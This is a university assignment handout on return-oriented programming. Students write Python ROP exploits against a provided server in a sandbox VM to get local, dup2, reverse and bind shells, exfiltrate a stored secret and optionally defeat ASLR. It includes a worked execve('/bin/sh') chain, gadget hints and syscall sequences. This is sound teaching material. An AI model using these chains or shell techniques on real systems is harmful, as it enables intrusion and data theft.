Project 2: Return-oriented Programming
Due: 2026-03-29 23:59
Goal
The goal of this project is to practice writing return-oriented programs and implement several different types of shellcode.
Specifically, there is one target binary which is an x86-64 Linux server program. The target server creates a socket and listens for incoming TCP connections. It engages in a very simple, text-based protocol in which the client sends one of 3 commands and the server sends a response. More details on this protocol are given below.
You will write five different Python programs which will exploit the server in different ways. The target server will run in the same sandbox VM that you used for project 1. Your exploit programs will run outside of the VM and will connect to the server in the VM.
Skeleton code for each Python program has been provided showing the arguments, but each will need substantial modification.
Collaboration
You may work on this project in collaboration with one or two partners as described on the main page.
You must not discuss the project with anyone other than your partners and course staff. You may use online resources for general reference, but not to search for solutions to specific questions posed in this project.
Preliminaries
Go to the GitHub Classroom page and accept the assignment.
- If you are working by yourself, create a new team (you can name it whatever you like).
- If you are working with a partner (which I recommend), one of you should create a new team and the other should join the team.
Warning: Do not join any team other than your partners’. There’s no way to change teams for the assignment so just don’t do it! (If you do join the wrong team by mistake, let me know immediately.)
Virtual Machine modifications
Since this project requires you to make network connections to the VM, you’re going to need to start by modifying the start.sh (or start.ps1) script that runs the VM to forward ports from your local computer to the VM.
Specifically, modify the line that starts with -netdev to the following:
-netdev user,id=net0,hostfwd=tcp:127.0.0.1:2200-:22,hostfwd=tcp:127.0.0.1:21234-:21234,hostfwd=tcp:127.0.0.1:21235-:21235
Make sure you include the line continuation character at the end of the line (a backslash for start.sh and a backtick for start.ps1). The new -netdev line instructs QEMU to
- forward port 2200 on your host machine to port 22 on the VM (this is the same as in project 1 and is the ssh port); and
- forward ports 21234 and 21235 from your host machine to the same ports in the VM.
You will run the target server on port 21234 and port 21235 will be used in one of the exploits.
The Target
The target binary has been compiled from target.c and uses the PCRE2 library (whose source is not provided). You must not change target or attempt to recompile it from target.c. If you do, your exploits will almost certainly not work against the unmodified target.
The target is a simple server program that listens on the specified port for a connection. Once connected, a client can send one of three commands:
PUT SECRET <password> <secret>\r\n
stores the provided password (which may not contain whitespace) and secret in memory.
GET SECRET <password>\r\n
responds with the secret, so long as the provided password matches the password provided in the previous PUT SECRET command.
responds with whatever text you sent it.
See target.c for the precise details.
The Assignment
There are five required tasks and one optional task. Each required task involves modifying a Python exploit program to construct a return-oriented exploit to exploit target in the manner specified.
Unlike Project 1, code injection will not be possible due to standard DEP protections. Instead, you will need to implement return-oriented programs. This will be tricky, but it is how modern software exploitation actually works.
The assignment repository contains two files, target-gadgets.txt and libc-gadgets.txt, that were produced by running Jonathan Salwan’s ROPgadget tool on target and on the libc that is loaded into the process, and then filtered to contain only the gadgets that end in ret.
You’re free to use gadgets from either, although you’ll definitely need to use at least the syscall ; ret gadget from libc.
Each gadget appears on a line by itself. For example,
0x0000000000001546 : pop rdi ; ret
is a gadget that can be used to load a value from the stack into register rdi. The leading number is the offset of these instructions from the address at which target (or libc) is loaded into memory, i.e., from its base address. To find the base addresses of target and libc, run ./target 21234 in one shell, get the PID of the target process, and then look at /proc/<pid>/maps in another shell.
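As a rough sketch of that lookup (not part of the provided skeleton), the function below parses the text of /proc/<pid>/maps and reports the lowest start address of the target and libc file mappings, which is the base address of a PIE executable or shared library. The function name and the rule that libc’s file name starts with "libc." are assumptions for illustration.

```python
def base_addresses(maps_text, names=("target", "libc")):
    """Map each name to the lowest start address of a file mapping with that name.

    maps_text is the contents of /proc/<pid>/maps. A mapping matches `name`
    if its file's basename equals name or starts with name + "." (so "libc"
    matches "libc.so.6" but not "libcrypt.so.1").
    """
    bases = {}
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue  # anonymous mapping with no pathname
        start = int(fields[0].split("-")[0], 16)
        basename = fields[5].rsplit("/", 1)[-1]
        for name in names:
            if basename == name or basename.startswith(name + "."):
                bases[name] = min(start, bases.get(name, start))
    return bases


# Usage (in the VM, with the PID of the running target):
#   with open(f"/proc/{pid}/maps") as f:
#       print({k: hex(v) for k, v in base_addresses(f.read()).items()})
```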
Each task description below contains an example which consists of running ./target 21234 in the VM and running the Python program for the task. In addition, each task description includes the partial output of running the target using strace(1). Your code should induce the same behavior in target. That is, replacing ./target 21234 with strace -o trace ./target 21234 and following the provided example should produce the same system calls, with the same arguments, in the same order as shown. (File descriptor numbers may be different from those shown, but should be self-consistent.)
You may not use any of the system calls that allocate writable and executable memory nor any system calls that change memory page permissions. In particular, all of the exploits you write must be entirely in the return-oriented style; you should not inject any x86-64 code.
When exploiting the target, you should not assume anything about stack addresses (in particular, you should not assume anything about environment variables) or file descriptor/socket numbers. In particular, I’m going to test your exploits by using random stack addresses (by setting environment variables) and with different numbers of open file descriptors.
For each of the tasks, write a few sentences in writeup.md that explains how the exploit works. If there are any tricky gadgets you used, explain what you had to do to make them work.
For the required tasks, address space layout randomization (ASLR) is turned off. I’ve provided a script in the assignment repository, aslr.sh, which can turn ASLR on or off. The VM has been configured to disable ASLR on startup, and aslr.sh does not make its changes permanent, so if you restart the VM while working on the optional task, you’ll need to re-enable ASLR.
Hints for all tasks
- To disassemble target, use objdump -d -Mintel target.
- strace(1) is an invaluable tool. Use it to run target to see what system call arguments you’re passing.
- Multiple calls to send(2) can be received by a single call to recv(2). If that’s not what you want, put a small delay between send calls.
- Don’t hardcode the addresses of gadgets. Instead, create variables target_base and libc_base (or similar) and add the gadget offsets to them. E.g., pop_rax = target_base + 0x1234. This will make doing the extra credit task much easier.
- Start early!
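Following the hint about not hardcoding gadget addresses, one possible layout is a single function that turns offsets into absolute addresses. The offsets below are made-up placeholders (not values from target-gadgets.txt or libc-gadgets.txt), and which gadget comes from which file is likewise an assumption.

```python
def gadget_addresses(target_base, libc_base):
    """Return absolute gadget addresses computed from the two base addresses."""
    # HYPOTHETICAL offsets: replace each with the real offset from
    # target-gadgets.txt or libc-gadgets.txt.
    target_offsets = {
        "pop_rdi": 0x1111,
    }
    libc_offsets = {
        "pop_rax": 0x2222,
        "pop_rsi": 0x3333,
        "pop_rdx": 0x4444,
        "store_rdx_rax": 0x5555,  # mov qword ptr [rdx], rax ; ret
        "syscall": 0x6666,        # syscall ; ret
    }
    addrs = {name: target_base + off for name, off in target_offsets.items()}
    addrs.update({name: libc_base + off for name, off in libc_offsets.items()})
    return addrs
```

With this arrangement only target_base and libc_base ever change between runs, which is what keeps the optional ASLR task manageable.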
The Tasks
Task 1 Local shell (local.py)
The first task is to exploit target and have it exec a shell.
Specifically, you’re going to want to remove most of the code in local.py and instead, construct a payload to send to the server by making socket calls. (See the Python socket library documentation for information on the various functions you can call on sockets.)
The payload you send to target is going to contain a return-oriented program that will make the system call execve("/bin/sh", NULL, NULL).
The easiest way to construct the ROP program in Python is to use the struct.pack function. You’re going to be using this function extensively, so it makes sense to import it directly.
The execve system call requires a pointer to the program to exec in register rdi. To accomplish this, we can write /bin/sh (followed by a 0 byte) somewhere in memory and then put a pointer to it in rdi. We’ll also need to put 0 in registers rsi and rdx and then put the system call number for execve in rax and make a syscall. Looking through the list of gadgets available, I see several gadgets that look useful for this purpose:
pop rax ; ret
pop rdx ; ret
pop rdi ; ret
pop rsi ; ret
mov qword ptr [rdx], rax ; ret
syscall ; ret
You may use others if you desire; all that matters is rax, rdi, rsi, and rdx have the correct values when the syscall instruction runs.
Let’s look at how we can construct such a return-oriented program.
from struct import pack
rop = bytearray()
# Write /bin/sh to the start of `target`'s data.
rop += pack('<QQ', pop_rdx, target_data)
rop += pack('<Q', pop_rax) + b'/bin/sh\x00'
rop += pack('<Q', store_rdx_rax)
# execve("/bin/sh", NULL, NULL)
rop += pack('<QQ', pop_rdi, target_data)
rop += pack('<QQ', pop_rsi, 0)
rop += pack('<QQ', pop_rdx, 0)
rop += pack('<QQ', pop_rax, 59)
rop += pack('<Q', syscall)
Not shown in the above code, I created variables corresponding to the addresses (not offsets!) of each of the gadgets. The code is using these variables with pack() to construct the return-oriented program.
Let’s take a look at the first few “instructions” in the program.
# Write /bin/sh to the start of `target`'s data.
rop += pack('<QQ', pop_rdx, target_data)
rop += pack('<Q', pop_rax) + b'/bin/sh\x00'
rop += pack('<Q', store_rdx_rax)
When rop is written to the stack, starting at the saved return address, it looks like this (the blank stack slots with an arrow to the right indicate that the stack slot is filled with the address of the gadget indicated).
│ │→ mov [rdx], rax ; ret
│ "/bin/sh\0" │
│ │→ pop rax ; ret
│ target_data │
rsp → │ │→ pop rdx ; ret
When the function returns, it will return to the pop rdx which will pop target_data off the stack into rdx. This should be the address of some writable data within the target’s memory. The subsequent ret will return to the pop rax instruction which will pop the 8 bytes corresponding to /bin/sh\0 into rax. The subsequent ret will return to mov [rdx], rax which will store the value in rax at the address pointed to by rdx.
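To see why the string can be handled as a single stack word, the snippet below (plain Python, independent of target) interprets the 8 bytes /bin/sh\0 as the little-endian integer that pop rax would load, then packs it back into the bytes that mov [rdx], rax would write.

```python
from struct import pack, unpack

word = b"/bin/sh\x00"
assert len(word) == 8  # exactly one 8-byte stack slot

# The value `pop rax` loads: x86-64 is little endian, so '/' (0x2f) is the low byte.
rax = unpack("<Q", word)[0]
print(hex(rax))  # 0x68732f6e69622f

# `mov qword ptr [rdx], rax` stores the same 8 bytes back in the original order.
assert pack("<Q", rax) == word
```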
The remaining ROP instructions,
# execve("/bin/sh", NULL, NULL)
rop += pack('<QQ', pop_rdi, target_data)
rop += pack('<QQ', pop_rsi, 0)
rop += pack('<QQ', pop_rdx, 0)
rop += pack('<QQ', pop_rax, 59)
rop += pack('<Q', syscall)
will pop target_data into rdi, 0 into rsi and rdx, 59—the system call number for execve—into rax, and finally return to the syscall instruction.
Notice that each 8-byte word in the rop bytearray is either the address of code to return to or some data that will be popped off the stack by the code.
To complete this task, modify local.py to:
- Exploit target and make it exec /bin/sh by overwriting the saved return address and the subsequent words on the stack with this return-oriented program. (Disassembling target using objdump -d -Mintel target can help you figure out where the saved return address is relative to the start of the array, or you can use gdb.)
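A minimal sketch of how local.py might deliver the chain follows. It assumes a hypothetical OFFSET (the distance from the start of the overflowed array to the saved return address, which you must find with objdump or gdb) and that the payload is sent as one line terminated by \r\n; check both against target.c before relying on them. The names build_payload and send_exploit are illustrative, not part of the skeleton.

```python
import socket

OFFSET = 0  # HYPOTHETICAL: bytes from the start of the array to the saved return address


def build_payload(rop, offset=OFFSET):
    """Filler up to the saved return address, followed by the ROP chain."""
    return b"A" * offset + bytes(rop)


def send_exploit(port, rop, host="127.0.0.1", terminator=b"\r\n"):
    """Connect to target and send the overflow; the terminator is an assumption."""
    with socket.create_connection((host, port)) as s:
        s.sendall(build_payload(rop) + terminator)
        # Read what target sends back first (e.g. "INVALID COMMAND\r\n").
        return s.recv(1024)
```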
To test that everything works, run ./target 21234 in the VM and, on your host machine, run ./local.py 21234. You should see something like the following in the VM’s shell.
user@sandbox:~/project-2$ ./target 21234
$
Running strace -o trace ./target 21234 and then running ./local.py 21234 writes the following (in part) to the file trace.
...
sendto(4, "INVALID COMMAND\r\n", 17, 0, NULL, 0) = 17
execve("/bin/sh", NULL, NULL) = 0
...
Hint: You’re going to want to remove essentially all of the skeleton code in local.py (and similarly for the other files). It exists only to show you how to use the socket API. In particular, you won’t want the send_cmd function; however, the loop for printing results may be useful in secret.py.
Task 2 Dup shell (dup.py)
The first exploit was fun to do (I hope), but not terribly useful. After all, it opened a shell on the remote machine with no way to communicate with it! You’re going to fix that right now.
You need to connect target’s stdin, stdout, and stderr to the socket before you exec /bin/sh. Fortunately, that’s easy to do with the dup2(2) system call.
To make a system call, you need to know what to put in each register. Filippo Valsorda’s Searchable Linux Syscall Table is a great resource for this. Search for dup2 and then double-click on the row of the table to see what goes in each register.
One potentially tricky aspect is that you need to put the socket file descriptor in register rdi, but you can’t know what value to use until the exploit connects. Looking at the disassembly for target, you’ll see that the return value from accept(2) (which is in eax) is stored in ebx in main before being put in edi as the argument to handle_connection(). Note that since file descriptors (and thus sockets) are ints, they’re 4 bytes, so the compiler is using registers eax, ebx, and edi rather than the full 64-bit registers rax, rbx, and rdi. This will be useful to you later on.
At the start of handle_connection, the socket is in all three of those registers, and its value gets saved in ebp. Unfortunately, rbx and rbp are restored from the stack prior to the ret, and our exploit will have overwritten those saved values. All hope is not lost: run target in gdb and break near the end of handle_connection. Luckily, the socket file descriptor is still available! (Hint: Look at the values in the registers using (gdb) info reg.)
In essence, you want to get the socket file descriptor that was returned from accept(2) in target—call it sock—and make the three system calls that correspond to
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
and then exec /bin/sh as you did in local.py.
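One way to emit the three dup2 calls is sketched below. set_rdi_to_sock is a hypothetical placeholder for whatever gadget words you find that move the socket descriptor into rdi/edi, and the gadget addresses are parameters rather than real values. On x86-64 Linux a system call changes only rax (the return value), rcx, and r11, so rdi keeps the socket descriptor across all three calls and only needs to be set once. 33 is the x86-64 system call number for dup2.

```python
from struct import pack

SYS_DUP2 = 33  # x86-64 Linux system call number for dup2


def dup2_chain(set_rdi_to_sock, pop_rsi, pop_rax, syscall):
    """ROP words for dup2(sock, 0); dup2(sock, 1); dup2(sock, 2)."""
    rop = bytearray(set_rdi_to_sock)  # rdi = sock (HYPOTHETICAL gadget words)
    for fd in (0, 1, 2):
        rop += pack("<QQ", pop_rsi, fd)        # rsi = descriptor to replace
        rop += pack("<QQ", pop_rax, SYS_DUP2)  # rax = 33
        rop += pack("<Q", syscall)             # syscall ; ret
    return bytes(rop)
```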
To complete this task, modify dup.py to:
- Exploit target and have it perform the dup2(2) system calls and exec the shell as described above; and
- Read from stdin and write to the socket, and read from the socket and write to stdout. You may find the console function in console.py useful for this task. Simply import the function using from console import console, pass the socket to console, and it should take care of everything. The prompt will not appear, but you can still enter commands and see the results.
To test that everything works, run ./target 21234 in the VM. On your computer, run
$ ./dup.py 21234
INVALID COMMAND
date
Thu Feb 26 15:14:26 EST 2026
exit
Running the example above under strace -o trace ./target 21234 writes the following (in part) to trace.
...
sendto(4, "INVALID COMMAND\r\n", 17, 0, NULL, 0) = 17
dup2(4, 0) = 0
dup2(4, 1) = 1
dup2(4, 2) = 2
execve("/bin/sh", NULL, NULL) = 0
...
read(0, "date\n", 8192) = 5
...
read(0, "exit\n", 8192) = 5
...
Task 3 Reverse shell (reverse.py)
The exploit used in dup.py connected the shell to the socket we used to connect to target initially. For this task, the exploit will cause target to make a connection to a remote server, connect the resultant socket to stdin/stdout/stderr (as was done in dup.py), and exec a shell.
Creating a new socket and making a connection involves making several system calls, including socket(2) and connect(2).
There are several ways to call these functions. Since they appear in target, it’s possible to return to them with the correct arguments in registers. However, the first argument to connect(2) is the return value from socket(2), which makes returning to the libc implementations more difficult than simply making the system calls directly, just as you did with dup2.
See the associated manual pages for example usage, the hints below for suggestions on making these system calls, and the example below for the arguments to the system calls.
As described below, reverse.py will create a listening socket that your exploit will connect to. Programs running inside the QEMU virtual machine can connect to the host computer using IP address 10.0.2.2. The port number used should be specified as an argument to reverse.py (see the example below).
To complete this task, modify reverse.py to:
- Open a socket to listen on the port specified as a command line parameter to reverse.py (see example below);
- Exploit target and have it make a new connection to 10.0.2.2 with the same port used in the first step. Once connected, target should exec a shell with stdin/stdout/stderr connected to the new socket; and
- Read from stdin and write to the newly opened socket, and read from the socket and write to stdout. Again, the console function may be helpful.
To test that everything works, run ./target 21234 in the VM. On your computer, run
$ ./reverse.py 21234 12345
date
Thu Feb 26 15:27:18 EST 2026
exit
Running the example above under strace -o trace ./target 21234 writes the following (in part) to the trace file.
...
sendto(4, "INVALID COMMAND\r\n", 17, 0, NULL, 0) = 17
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 5
connect(5, {sa_family=AF_INET, sin_port=htons(12345), sin_addr=inet_addr("10.0.2.2")}, 16) = 0
dup2(5, 0) = 0
dup2(5, 1) = 1
dup2(5, 2) = 2
execve("/bin/sh", NULL, NULL) = 0
...
read(0, "date\n", 8192) = 5
...
read(0, "exit\n", 8192) = 5
...
Hints: When you create a new socket using the socket system call, the value of that socket will be returned in eax (the value 5 in the example above). This value is needed as an argument to connect as well as dup2. You cannot rely on it having a fixed value. Instead, you should write the value of rax somewhere in memory (just as you do for /bin/sh) and then load it back into the appropriate register. Specifically, you’ll need it in rdi, or really, since it’s a 32-bit value, putting it in edi is sufficient.
There are multiple gadgets that can do this, but nothing as easy as mov rdi, qword ptr [reg] ; ret or mov edi, dword ptr [reg] ; ret. One way to do this is to use a more complicated gadget that loads a value from memory into rdi or edi but also does other things before returning. Make sure those other things do not modify the values of registers you care about. A second way is to use an arithmetic or logical instruction to load the value into the register. For example, you can set rdi/edi to 0 and then use an add or or instruction to combine a value from memory into rdi/edi. Similarly, you can set rdi/edi to -1 and then use an and instruction with a value from memory. (I’m not claiming that all of these gadgets exist, merely that at least one gadget of this form does exist.)
The connect system call requires a pointer to a struct sockaddr. This is a bit of a historical oddity. A struct sockaddr doesn’t actually contain enough information to make a connection. It’s a generic structure that contains a 2-byte field named sa_family, which identifies what type of structure it actually is, followed by an array of some size called sa_data. In this case, you want to use a struct sockaddr_in (which is also described in that man page), which specifies an IPv4 address and port. The layout of a struct sockaddr_in is as follows.
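A sketch of the save-and-reload pattern follows. save_rax reuses the pop rdx ; ret and mov qword ptr [rdx], rax ; ret gadgets from Task 1, and scratch is any writable address that doesn’t overlap the /bin/sh string (an assumption you must check). load_edi uses two hypothetical gadgets, xor edi, edi ; ret and or edi, dword ptr [rdx] ; ret, purely to illustrate the "zero, then or from memory" approach; they may not exist in the provided gadget files, so substitute whatever equivalent you actually find.

```python
from struct import pack


def save_rax(pop_rdx, store_rdx_rax, scratch):
    """Store rax (e.g. the descriptor returned by socket(2)) at address scratch."""
    # pop rdx ; ret does not touch rax, so the syscall's return value survives.
    return pack("<QQQ", pop_rdx, scratch, store_rdx_rax)


def load_edi(pop_rdx, scratch, zero_edi, or_edi_mem):
    """Reload the saved 32-bit value into edi using HYPOTHETICAL gadgets."""
    # Writing a 32-bit register zero-extends into the full 64-bit rdi.
    return pack("<QQQQ", pop_rdx, scratch, zero_edi, or_edi_mem)
```

The save goes immediately after the socket system call; the reload goes before connect and before the dup2 calls.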
bytes field description endian
------------------------------------------------------------
00-01 sin_family this is AF_INET (value 2) native endian
02-03 sin_port the port number network endian
04-07 sin_addr the IPv4 address network endian
08-0F unused by sockaddr_in
Notice that this structure has one field, sin_family, stored as a host native endian value (i.e., little endian for x86-64), while the sin_port and sin_addr fields are stored in network endian (i.e., big endian)! You can use pack('>HL', port, addr) to write them in big endian. To convert an IPv4 address like 1.2.3.4 to a 32-bit integer, convert each of the 4 fields to two hex digits individually and concatenate them. So, for example, 1.2.3.4 becomes 0x01020304 and 127.0.0.1 becomes 0x7F000001.
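The layout in the table can be produced with struct.pack as sketched below; ipv4_to_int and sockaddr_in are illustrative helper names, and zero-filling bytes 08-0F is an assumption that matches common practice. The 16 resulting bytes can be placed on the stack and written into target’s memory in two 8-byte pieces, just as /bin/sh\0 was.

```python
from struct import pack

AF_INET = 2


def ipv4_to_int(dotted):
    """'1.2.3.4' -> 0x01020304: each field becomes one byte, first field most significant."""
    a, b, c, d = (int(part) for part in dotted.split("."))
    return (a << 24) | (b << 16) | (c << 8) | d


def sockaddr_in(addr, port):
    """16-byte struct sockaddr_in for connect(2) or bind(2)."""
    family = pack("<H", AF_INET)                      # native (little) endian
    port_addr = pack(">HL", port, ipv4_to_int(addr))  # network (big) endian
    return family + port_addr + b"\x00" * 8           # bytes 08-0F unused, zeroed


sa = sockaddr_in("10.0.2.2", 12345)
print(sa.hex())  # 020030390a0002020000000000000000
```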
Task 4 Bind shell (bind.py)
The exploit used in dup.py connected the shell to the socket we used to connect to target initially; the exploit used in reverse.py made a connection back to the attacker. For this task, the exploit will cause target to start listening on a specified port and, when a new connection occurs, connect stdin/stdout/stderr to the newly connected socket and exec a shell. This is called a bind shell.
Listening on a port and accepting new connections involves making several system calls, including socket(2), bind(2), listen(2), and accept(2).
As was the case for reverse.py, there are several ways to call these functions. As before, it’s easiest to just make the system calls directly.
See target.c and the associated manual pages for example usage, the hints below for suggestions on making these system calls, and the example below for the arguments to the system calls.
Note that like connect, bind also requires passing a pointer to a struct sockaddr_in. In this case, you can use the address 0.0.0.0 to mean accept connections from any address.
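The strace output in the example below maps onto the following x86-64 Linux system call numbers. The helper sketched here (a hypothetical name, not part of the skeleton) appends the pop rax / syscall tail to whatever gadget words you use to set up rdi, rsi, and rdx. It loads rax last because some setup gadgets, such as the mov rdi, rdx ; jmp rax gadget discussed in Task 5, use rax themselves.

```python
from struct import pack

# x86-64 Linux system call numbers used across the tasks.
SYS = {
    "write": 1,
    "dup2": 33,
    "socket": 41,
    "connect": 42,
    "accept": 43,
    "bind": 49,
    "listen": 50,
    "execve": 59,
    "exit": 60,
}

AF_INET, SOCK_STREAM = 2, 1


def syscall_words(name, pop_rax, syscall, setup=b""):
    """Argument-setup gadget words, then rax = SYS[name], then syscall ; ret."""
    return bytes(setup) + pack("<QQQ", pop_rax, SYS[name], syscall)


# The bind shell, in the order strace shows it (arguments in rdi, rsi, rdx):
#   socket(AF_INET, SOCK_STREAM, 0)   -> new fd in rax; save it
#   bind(fd, &sockaddr_in, 16)        -> address 0.0.0.0, port from the command line
#   listen(fd, 1)
#   accept(fd, NULL, NULL)            -> connected fd in rax; save it
#   dup2(connected_fd, 0/1/2), then execve("/bin/sh", NULL, NULL)
```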
To complete this task, modify bind.py to:
- Exploit target and have it listen for a new connection on a different port (specified as a command line parameter to bind.py; see example below). Once a connection happens, target should exec a shell with stdin/stdout/stderr connected to the socket;
- Make a new connection to 127.0.0.1:<listen_port>, where <listen_port> is the port specified as the second command line parameter (see example); and
- Read from stdin and write to the newly opened socket, and read from the socket and write to stdout. Again, the console function may be helpful.
The modifications to the start.sh script described above forward port 21235 from the host to the VM, so that’s the port you’re going to want to listen on.
To test that everything works, run ./target 21234 in the VM. On your computer, run
$ ./bind.py 21234 21235
date
Thu Feb 26 16:10:03 EST 2026
exit
Running the example above under strace -o trace ./target 21234 writes the following (in part) to the trace file.
...
sendto(4, "INVALID COMMAND\r\n", 17, 0, NULL, 0) = 17
socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 5
bind(5, {sa_family=AF_INET, sin_port=htons(21235), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(5, 1) = 0
accept(5, NULL, NULL) = 6
dup2(6, 0) = 0
dup2(6, 1) = 1
dup2(6, 2) = 2
execve("/bin/sh", NULL, NULL) = 0
...
read(0, "date\n", 8192) = 5
...
read(0, "exit\n", 8192) = 5
...
Task 5 Data exfiltration (secret.py)
The final task is to convince target to write its secret to the socket without knowing the password. No need to get a shell this time.
It’s possible to write to a socket using send(2) or write(2). The send system call is slightly more complicated to use than write, so use write instead.
You will need to know how much data to write. This value is not stored anywhere in memory directly. Instead, you’ll want to call strlen() on the secret value. (You could instead implement strlen() in a return-oriented fashion but loops are significantly more complicated to write than making function calls and we don’t have many convenient gadgets for conditionally changing the stack pointer, so let’s not do that here.)
Somewhat annoyingly, the strlen symbol in glibc is not actually the strlen function. Specifically, if we try to return to the strlen symbol (which lives at offset 0x9f1b0 in glibc), the return value in rax is not the length of the string pointed to by rdi. If we use readelf --syms on glibc and compare strlen to a normal function like fread, we can see what is going on.
$ readelf --syms /lib/x86_64-linux-gnu/libc.so.6|egrep 'strlen|fread'
507: 00000000000766a0 242 FUNC WEAK DEFAULT 16 fread@@GLIBC_2.2.5
1122: 000000000009f1b0 129 IFUNC GLOBAL DEFAULT 16 strlen@@GLIBC_2.2.5
From this output, we can see that strlen is not a FUNC, it’s an IFUNC. An IFUNC is an indirect function. It’s a way for glibc to provide multiple, optimized implementations of functions. The function that gets called at run time depends on the capabilities of the computer. Specifically, the value that gets returned by the strlen indirect function is the address of the machine-specific strlen function. So what does that mean for this exploit? Well, you have at least 3 options for calling strlen.
- target itself calls strlen through its PLT; you can do that as well;
- You can get the address of the real strlen function that glibc will use, e.g., by using gdb; or
- You can return to the strlen resolver function at libc_base + 0x9f1b0 and then use a push rax ; ret gadget immediately afterward to return to the actual function.
Any of these approaches should work.
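A sketch of the third option follows. set_rdi is a placeholder for the gadget words that put the secret’s address in rdi, push_rax is the address of a push rax ; ret gadget, and 0x9f1b0 is the resolver offset from the readelf output above. Like the text, it places push rax ; ret immediately after the resolver, which assumes the resolver leaves rdi unchanged.

```python
from struct import pack

STRLEN_IFUNC = 0x9F1B0  # strlen resolver offset in libc (readelf output above)


def strlen_via_resolver(libc_base, set_rdi, push_rax):
    """ROP words that leave strlen(rdi) in rax."""
    rop = bytearray(set_rdi)                     # rdi = address of the secret
    rop += pack("<Q", libc_base + STRLEN_IFUNC)  # resolver returns &real_strlen in rax
    rop += pack("<Q", push_rax)                  # push rax ; ret jumps to real strlen
    # The real strlen returns to the next word of the chain, with the length in rax.
    return bytes(rop)
```

push rax writes the resolver’s result just below the current stack pointer, and the ret that follows immediately pops it, so execution enters the real strlen with rsp again pointing at the next word of your chain.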
To complete this task, modify secret.py to:
- Exploit target and have it write the secret value to the socket by making a write(2) system call. Afterward, exit cleanly by making an exit system call with exit status 0. (See the hints below for suggestions on making multiple system calls.)
- Read the secret from the socket and print it out. (The secret won’t have a newline, so you’ll probably want to add that yourself.)
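For the reading half, one option (a sketch, not the skeleton’s own loop) is to read until target closes the connection, which happens once the exit system call runs, and then print everything with a trailing newline. read_until_closed is a hypothetical helper name.

```python
import socket


def read_until_closed(sock):
    """Collect everything sent on sock until the peer closes the connection."""
    chunks = []
    while True:
        data = sock.recv(4096)
        if not data:  # empty read: target has exited and the socket is closed
            break
        chunks.append(data)
    return b"".join(chunks)


# Usage, after sending the exploit on socket s:
#   print(read_until_closed(s).decode(errors="replace"))  # print() adds the newline
```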
Your secret.py should assume that a secret has already been set.
To test that everything works, run ./target 21234 in the VM. On your computer, run
$ echo 'PUT SECRET password1 This is super secret!' | nc -C 127.0.0.1 21234
SECRET STORED
$ ./secret.py 21234
INVALID COMMAND
This is super secret!
Running the example above under strace -o trace ./target 21234 writes the following (in part) to the trace file.
...
accept(3, NULL, NULL) = 4
recvfrom(4, "PUT SECRET password1 This is sup"..., 1024, 0, NULL, NULL) = 43
recvfrom(4, "", 1067, 0, NULL, NULL) = 0
sendto(4, "SECRET STORED\r\n", 15, 0, NULL, 0) = 15
close(4) = 0
accept(3, NULL, NULL) = 4
...
sendto(4, "INVALID COMMAND\r\n", 17, 0, NULL, 0) = 17
write(4, "This is super secret!", 21) = 21
exit(0) = ?
Hint: Moving data between registers is surprisingly tricky. In particular, getting a 64-bit, nonconstant value into rdi was quite difficult. For 32-bit values, you wrote the value to memory and then read it back into edi. That won’t work here since we need an address in rdi. If you search the gadgets files for gadgets that use rdi as a destination register, you won’t find many of them. I think there are a few ways to do it (possibly using sub rdi, ... and some arithmetic, but I didn’t attempt this). I think the easiest way is to use a somewhat surprising gadget, mov rdi, rdx ; jmp rax. Note that this ends in a jmp to rax rather than a ret. So how do we make this work? Well, if we first put the address of a ret in rax and then return to the mov rdi, rdx ; jmp rax gadget, it will move rdx into rdi and then jump to a ret which will allow us to continue with our return-oriented program.
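The trick described in the hint can be packaged as a short sequence of words. The gadget addresses are parameters (placeholders). Any address of a lone ret instruction works for ret_addr, for instance pop_rax + 1, because pop rax is the single-byte instruction 0x58 followed directly by the ret. This sequence overwrites rax, so it has to come before anything that needs rax, such as loading a system call number.

```python
from struct import pack


def rdx_to_rdi(pop_rax, ret_addr, mov_rdi_rdx_jmp_rax):
    """ROP words that copy rdx into rdi using mov rdi, rdx ; jmp rax."""
    return pack(
        "<QQQ",
        pop_rax, ret_addr,    # rax = address of a bare ret
        mov_rdi_rdx_jmp_rax,  # rdi = rdx, then jmp rax lands on that ret,
    )                         # which pops the next word of the chain
```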
Optional Task ASLR
This task is optional. If you’ve completed tasks 1–5, then you’re done and you don’t need to do this. If you want a little extra challenge, this task is for you.
In this task, you’re going to modify all 5 of your required exploits to work when address space layout randomization (ASLR) is turned on. If you have followed the hint above about using target_base and libc_base variables, then the only new thing you’ll need to do is learn (at runtime!) where the target and libc are loaded in memory and set those two variables appropriately. Everything else should work.
I’ve provided an aslr.sh script which can enable ASLR. You’ll want to turn it on (and enter user as the password when it asks).
To complete this task:
- Modify each of your exploits to learn the base addresses of target and libc, and use those addresses to construct your return-oriented program.
Hints: I solved this by creating an addr.py file that contains two functions, target_base(port) and libc_base(port). Each connects to the target and exploits a bug to leak an address in target or libc, respectively. From this leaked address, the function computes the base address via simple arithmetic and returns it. Each of my 5 exploit programs imports addr and then calls the appropriate functions to set the target_base and libc_base variables.
When a program starts, the first function that runs is not main. Instead, the program starts running at _start. From disassembling target, you can see that _start calls __libc_start_main and passes it the address of main as an argument. After initializing libc’s data, __libc_start_main will call main. You can make use of this fact to learn the offset of an instruction in target and an instruction in libc.
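Once a leak gives you a code address, the "simple arithmetic" in the hint is a subtraction. The sketch below adds a sanity check that relies on PIE executables and shared libraries being mapped at page-aligned (4 KiB) addresses. The leaked value and the 0x29d90 offset in the usage line are made-up numbers; the real offset is whatever you find for the leaked instruction by disassembling target or libc.

```python
from struct import unpack


def base_from_leak(leaked_bytes, known_offset):
    """Base address from an 8-byte little-endian leaked code address."""
    leaked = unpack("<Q", leaked_bytes[:8])[0]
    base = leaked - known_offset
    if base & 0xFFF:  # bases are page aligned, so the low 12 bits must be 0
        raise ValueError(f"base {base:#x} is not page aligned; wrong offset?")
    return base


# Example with made-up numbers:
#   base_from_leak((0x7FFFF7DA9D90).to_bytes(8, "little"), 0x29D90) == 0x7FFFF7D80000
```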
Deliverables
- The five exploit programs, local.py, dup.py, reverse.py, bind.py, and secret.py, plus any additional Python files you created that are required to run them.
- writeup.md containing descriptions of your exploits. If you did the optional task, writeup.md should explain how you learned the base addresses of target and libc.